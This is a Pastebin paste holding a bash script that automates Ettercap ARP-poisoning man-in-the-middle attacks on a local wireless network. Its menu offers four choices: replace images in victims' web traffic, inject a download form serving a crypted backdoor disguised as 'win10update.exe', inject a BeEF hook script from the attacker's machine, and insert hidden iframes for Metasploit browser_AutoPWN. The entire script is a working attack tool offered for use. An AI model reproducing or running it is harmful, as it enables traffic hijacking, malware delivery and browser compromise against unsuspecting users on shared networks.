Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #Replace images
- clear
- rm iFrame.ef dwnloadtrojan.ef swapimg.ef beefhook.ef 2&>/dev/null
- echo -e "Ettercap Filters Compilation"
- sleep 2
- echo -e "Checking requirements..."
- sleep 1
- if [[ $(id -u) = 0 ]]; then
- echo && echo -e " Checking For ROOT: PASSED"
- else
- echo && echo -e " Checking For ROOT: FAILED : This Script Needs To Run As ROOT"
- echo -e "Will Now Exit"
- echo
- sleep 1
- exit
- fi
- echo -ne "What is your wireless interface? eg wlan0 : "
- read intface
- sleep 2
- echo -e "Starting Web server..."
- service apache2 start
- sleep 2
- echo -e "Done setting"
- echo
- sleep 2
- clear
- echo -e "Ettercap Filters Compilation"
- sleep 2
- echo
- echo -ne "Choose:
- 1. Replace images in remote browsers
- 2. Create Trojan Downloader AD
- 3. Inject beef hook in remote browsers
- 4. Inject iFrame
- : "
- read choice
- # Replace images
- if [[ $choice == 1 ]]; then
- echo -ne "An image link is required. The image should be accessible from
- a web server, either locally or internet in a URL format.
- eg: http://192.168.0.1/pwn.jpg. Place a picture in the web root (/var/www)
- and provide its link here.
- : "
- read imagelink
- sleep 1
- echo "Creating ettercap filter..."
- echo "if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"gzip\")) {
- replace(\"gzip\", \" \");
- msg(\"[*] Zapped 'gzip'\\n\");
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
- # NOTE: Replacing string MUST be same size as original string
- msg(\"Zapped 'Accept-Encoding'\\n\");
- }
- }
- if (ip.proto == TCP && tcp.src == 80) {
- replace(\"img scr=\", \"img src=\"$imagelink\"\");
- replace(\"IMG SRC=\", \"img src=\"$imagelink\"\");
- msg(\"Filter Ran.\\n\");
- }" > swapimage.filter
- sleep 1
- echo -e "Compiling filter.."
- etterfilter swapimage.filter -o swapimg.ef
- rm swapimage.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F swapimg.ef -M ARP // //
- elif [[ $choice == 2 ]]; then
- #Download Trojan
- echo -e "Creating backdoor..."
- echo
- python crypter.py
- mv backdoor.exe /var/www/win10update.exe
- echo Backdoor URL: http://[yourIP]/win10update.exe
- echo -ne "Place your backdoor and an image in web root (/var/www), then
- provide their link below.
- Backdoor URL eg. http://192.168.0.1/meterpreter.exe
- : "
- read trojanlink
- echo -ne "Image URL eg. http://192.168.0.1/image.jpg
- : "
- read imagelink
- echo "if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"gzip\")) {
- replace(\"gzip\", \" \");
- msg(\"[*] Zapped 'gzip'\\n\");
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\\n\");
- # NOTE: Replacing string MUST be same size as original string
- msg(\"Zapped Accept-Encoding\"\\n\");
- }
- }
- if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"<title>\")) {
- replace(\"</title>\", \"</title><form action='$trojanlink' method=\"link\"><img src=\"$imagelink\"><INPUT TYPE=submit value=\"DOWNLOAD\"></form><html><body><h10>Just some instructions</h10></body></html>\");
- msg(\"HTML Injected\\n\");
- }
- }" > downloadtrojan.filter
- echo -e "Compiling filter.."
- etterfilter downloadtrojan.filter -o dwnloadtrojan.ef
- rm downloadtrojan.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F dwnloadtrojan.ef -M ARP // //
- elif [[ $choice == 3 ]]; then
- # Beef hook
- echo -ne "You neet to provide IP of the PC running beef.
- Make sure beef is already started.
- : "
- read ip
- echo "if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"gzip\")) {
- replace(\"gzip\", \" \");
- msg(\"[*] Zapped 'gzip'\\n\");
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
- # NOTE: Replacing string MUST be same size as original string
- msg(\"Zapped Accept-Encoding\\n\");
- }
- }
- if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"</head>\")) {
- replace(\"</head>\", \"</head><script src=\"http://$ip:3000/hook.js\"></script> \");
- msg(\"Code injected. Beef Hooked\\n\");
- }
- }" > beefhook.filter
- echo -e "Compiling filter.."
- etterfilter beefhook.filter -o beefhook.ef
- rm beefhook.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F beefhook.ef -M ARP // //
- elif [[ $choice == 4 ]]; then
- #Injecting iFrame
- echo -ne "Injecting iFrame in websites. You need to provide link to your iFrame.
- eg. http://192.168.0.1/iframe.html here
- : "
- read ourIP
- echo
- echo -ne "What is your IP?: "
- read iq
- sleep 2
- echo -e "Generating Ettercap filter.."
- echo "# iFrame.filter --- Ettercap injection filter created for Metasploit's browser_AutoPWN
- # Generated by iFrame.sh v0.1. g0tmi1k ~ 2011-01-21
- if (ip.proto == TCP && ip.dst != '$iq') { # If traffic using TCP protocol and its not comng to us,
- if (search(DATA.data, \"gzip\")) { # ...and if it contains an gzip in its header:
- replace(\"gzip\", \" \"); # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
- msg(\"[*] Zapped 'gzip'\\n\"); # Let us know it's been done (=
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
- msg(\"[*] Zapped 'Accept-Encoding'\\n\");
- }
- if (search(DATA.data, \"</title>\")){ # Is there something for us to inject into?
- replace(\"</title>\",\"</title><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\"); # ...Insert our iframe to the webpage!
- msg(\"[>] Injecting into (</title>)\\n\"); # Let us know we have done it (=
- }
- if (search(DATA.data, \"</TITLE>\")){
- replace(\"</TITLE>\",\"</TITLE><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
- msg(\"[>] Injecting into (</TITLE>)\\n\");
- }
- if (search(DATA.data, \"body>\")){
- replace(\"body>\",\"body><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
- msg(\"[>] Injecting into (body>)\\n\");
- }
- if (search(DATA.data, \"BODY>\")){
- replace(\"BODY>\",\"BODY><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
- msg(\"[>] Injecting into (BODY>)\\n\");
- }
- if (search(DATA.data, \"http://$ourIP\")){ # ...and search data, to test for our 'tweak' ;)
- msg(\"[+] Injected Correctly!\\n\"); # Let us know it's been done done
- }
- }" > iFrame.filter
- echo -e "Compiling filter.."
- etterfilter iFrame.filter -o iFrame.ef
- rm iFrame.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F iFrame.ef -M ARP // //
- else
- echo "Invalid choice"
- echo "Exiting.."
- sleep 2
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement